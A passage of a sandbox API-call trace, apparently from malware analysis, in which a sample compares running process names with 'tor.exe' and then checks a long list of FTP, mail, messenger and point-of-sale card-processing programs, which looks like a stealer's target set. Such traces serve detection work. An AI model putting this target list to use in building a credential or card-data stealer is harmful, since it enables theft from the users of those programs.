lpString2="tor.exe") returned -1 [0261.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0261.537] lstrcmpiA (lpString1="explorer.exe", lpString2="tor.exe") returned -1 [0261.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0261.537] lstrcmpiA (lpString1="dwm.exe", lpString2="tor.exe") returned -1 [0261.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.537] lstrcmpiA (lpString1="svchost.exe", lpString2="tor.exe") returned -1 [0261.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0261.537] lstrcmpiA (lpString1="spoolsv.exe", lpString2="tor.exe") returned -1 [0261.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhost.exe", lpUsedDefaultChar=0x0) returned 13 [0261.537] lstrcmpiA (lpString1="taskhost.exe", lpString2="tor.exe") returned -1 [0261.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.538] lstrcmpiA (lpString1="svchost.exe", lpString2="tor.exe") returned -1 [0261.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0261.538] lstrcmpiA (lpString1="OfficeClickToRun.exe", lpString2="tor.exe") returned -1 [0261.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0261.538] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="tor.exe") returned 1 [0261.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.538] lstrcmpiA (lpString1="svchost.exe", lpString2="tor.exe") returned -1 [0261.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0261.538] lstrcmpiA (lpString1="sppsvc.exe", lpString2="tor.exe") returned -1 [0261.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="iexplore.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iexplore.exe", lpUsedDefaultChar=0x0) returned 13 [0261.538] lstrcmpiA (lpString1="iexplore.exe", lpString2="tor.exe") returned -1 [0261.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="iexplore.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iexplore.exe", lpUsedDefaultChar=0x0) returned 13 [0261.538] lstrcmpiA (lpString1="iexplore.exe", lpString2="tor.exe") returned -1 [0261.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sufferexistrich.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sufferexistrich.exe", lpUsedDefaultChar=0x0) returned 20 [0261.538] lstrcmpiA (lpString1="sufferexistrich.exe", lpString2="tor.exe") returned -1 [0261.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="have return physical.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="have return physical.exe", lpUsedDefaultChar=0x0) returned 25 [0261.538] lstrcmpiA (lpString1="have return physical.exe", lpString2="tor.exe") returned -1 [0261.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="or level.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="or level.exe", lpUsedDefaultChar=0x0) returned 13 [0261.538] lstrcmpiA (lpString1="or level.exe", lpString2="tor.exe") returned -1 [0261.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="court camera.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="court camera.exe", lpUsedDefaultChar=0x0) returned 17 [0261.538] lstrcmpiA (lpString1="court camera.exe", lpString2="tor.exe") returned -1 [0261.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="or-finger.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="or-finger.exe", lpUsedDefaultChar=0x0) returned 14 [0261.539] lstrcmpiA (lpString1="or-finger.exe", lpString2="tor.exe") returned -1 [0261.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="travel imagine recently.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="travel imagine recently.exe", lpUsedDefaultChar=0x0) returned 28 [0261.539] lstrcmpiA (lpString1="travel imagine recently.exe", lpString2="tor.exe") returned 1 [0261.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="school_for.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="school_for.exe", lpUsedDefaultChar=0x0) returned 15 [0261.539] lstrcmpiA (lpString1="school_for.exe", lpString2="tor.exe") returned -1 [0261.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="whosefirmthe.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whosefirmthe.exe", lpUsedDefaultChar=0x0) returned 17 [0261.539] lstrcmpiA (lpString1="whosefirmthe.exe", lpString2="tor.exe") returned 1 [0261.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="seat_raise_join.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="seat_raise_join.exe", lpUsedDefaultChar=0x0) returned 20 [0261.539] lstrcmpiA (lpString1="seat_raise_join.exe", lpString2="tor.exe") returned -1 [0261.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="formerbuildpresent.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="formerbuildpresent.exe", lpUsedDefaultChar=0x0) returned 23 [0261.539] lstrcmpiA (lpString1="formerbuildpresent.exe", lpString2="tor.exe") returned -1 [0261.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="unittype.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="unittype.exe", lpUsedDefaultChar=0x0) returned 13 [0261.539] lstrcmpiA (lpString1="unittype.exe", lpString2="tor.exe") returned 1 [0261.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="allow.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="allow.exe", lpUsedDefaultChar=0x0) returned 10 [0261.539] lstrcmpiA (lpString1="allow.exe", lpString2="tor.exe") returned -1 [0261.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="rate.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rate.exe", lpUsedDefaultChar=0x0) returned 9 [0261.539] lstrcmpiA (lpString1="rate.exe", lpString2="tor.exe") returned -1 [0261.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="pushweight.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pushweight.exe", lpUsedDefaultChar=0x0) returned 15 [0261.539] lstrcmpiA (lpString1="pushweight.exe", lpString2="tor.exe") returned -1 [0261.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="film.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="film.exe", lpUsedDefaultChar=0x0) returned 9 [0261.539] lstrcmpiA (lpString1="film.exe", lpString2="tor.exe") returned -1 [0261.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dead.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dead.exe", lpUsedDefaultChar=0x0) returned 9 [0261.539] lstrcmpiA (lpString1="dead.exe", lpString2="tor.exe") returned -1 [0261.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="than.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="than.exe", lpUsedDefaultChar=0x0) returned 9 [0261.540] lstrcmpiA (lpString1="than.exe", lpString2="tor.exe") returned -1 [0261.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="feel.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="feel.exe", lpUsedDefaultChar=0x0) returned 9 [0261.540] lstrcmpiA (lpString1="feel.exe", lpString2="tor.exe") returned -1 [0261.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0261.540] lstrcmpiA (lpString1="3dftp.exe", lpString2="tor.exe") returned -1 [0261.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0261.540] lstrcmpiA (lpString1="absolutetelnet.exe", lpString2="tor.exe") returned -1 [0261.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0261.540] lstrcmpiA (lpString1="alftp.exe", lpString2="tor.exe") returned -1 [0261.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0261.540] lstrcmpiA (lpString1="barca.exe", lpString2="tor.exe") returned -1 [0261.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0261.540] lstrcmpiA (lpString1="bitkinex.exe", lpString2="tor.exe") returned -1 [0261.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0261.540] lstrcmpiA (lpString1="coreftp.exe", lpString2="tor.exe") returned -1 [0261.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0261.540] lstrcmpiA (lpString1="far.exe", lpString2="tor.exe") returned -1 [0261.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0261.540] lstrcmpiA (lpString1="filezilla.exe", lpString2="tor.exe") returned -1 [0261.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0261.540] lstrcmpiA (lpString1="flashfxp.exe", lpString2="tor.exe") returned -1 [0261.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0261.541] lstrcmpiA (lpString1="fling.exe", lpString2="tor.exe") returned -1 [0261.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0261.541] lstrcmpiA (lpString1="foxmailincmail.exe", lpString2="tor.exe") returned -1 [0261.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0261.541] lstrcmpiA (lpString1="gmailnotifierpro.exe", lpString2="tor.exe") returned -1 [0261.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0261.541] lstrcmpiA (lpString1="icq.exe", lpString2="tor.exe") returned -1 [0261.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0261.542] lstrcmpiA (lpString1="leechftp.exe", lpString2="tor.exe") returned -1 [0261.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0261.542] lstrcmpiA (lpString1="ncftp.exe", lpString2="tor.exe") returned -1 [0261.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0261.542] lstrcmpiA (lpString1="notepad.exe", lpString2="tor.exe") returned -1 [0261.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0261.542] lstrcmpiA (lpString1="operamail.exe", lpString2="tor.exe") returned -1 [0261.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0261.542] lstrcmpiA (lpString1="outlook.exe", lpString2="tor.exe") returned -1 [0261.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0261.542] lstrcmpiA (lpString1="pidgin.exe", lpString2="tor.exe") returned -1 [0261.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0261.542] lstrcmpiA (lpString1="scriptftp.exe", lpString2="tor.exe") returned -1 [0261.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0261.542] lstrcmpiA (lpString1="skype.exe", lpString2="tor.exe") returned -1 [0261.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0261.542] lstrcmpiA (lpString1="smartftp.exe", lpString2="tor.exe") returned -1 [0261.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0261.542] lstrcmpiA (lpString1="thunderbird.exe", lpString2="tor.exe") returned -1 [0261.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0261.542] lstrcmpiA (lpString1="trillian.exe", lpString2="tor.exe") returned 1 [0261.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0261.543] lstrcmpiA (lpString1="webdrive.exe", lpString2="tor.exe") returned 1 [0261.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0261.543] lstrcmpiA (lpString1="whatsapp.exe", lpString2="tor.exe") returned 1 [0261.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0261.543] lstrcmpiA (lpString1="winscp.exe", lpString2="tor.exe") returned 1 [0261.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0261.543] lstrcmpiA (lpString1="yahoomessenger.exe", lpString2="tor.exe") returned 1 [0261.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0261.543] lstrcmpiA (lpString1="active-charge.exe", lpString2="tor.exe") returned -1 [0261.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0261.543] lstrcmpiA (lpString1="accupos.exe", lpString2="tor.exe") returned -1 [0261.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0261.543] lstrcmpiA (lpString1="afr38.exe", lpString2="tor.exe") returned -1 [0261.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0261.543] lstrcmpiA (lpString1="aldelo.exe", lpString2="tor.exe") returned -1 [0261.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0261.543] lstrcmpiA (lpString1="ccv_server.exe", lpString2="tor.exe") returned -1 [0261.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0261.543] lstrcmpiA (lpString1="centralcreditcard.exe", lpString2="tor.exe") returned -1 [0261.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0261.543] lstrcmpiA (lpString1="creditservice.exe", lpString2="tor.exe") returned -1 [0261.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0261.544] lstrcmpiA (lpString1="edcsvr.exe", lpString2="tor.exe") returned -1 [0261.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0261.544] lstrcmpiA (lpString1="fpos.exe", lpString2="tor.exe") returned -1 [0261.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0261.544] lstrcmpiA (lpString1="isspos.exe", lpString2="tor.exe") returned -1 [0261.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0261.544] lstrcmpiA (lpString1="mxslipstream.exe", lpString2="tor.exe") returned -1 [0261.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0261.544] lstrcmpiA (lpString1="omnipos.exe", lpString2="tor.exe") returned -1 [0261.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0261.544] lstrcmpiA (lpString1="spcwin.exe", lpString2="tor.exe") returned -1 [0261.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, 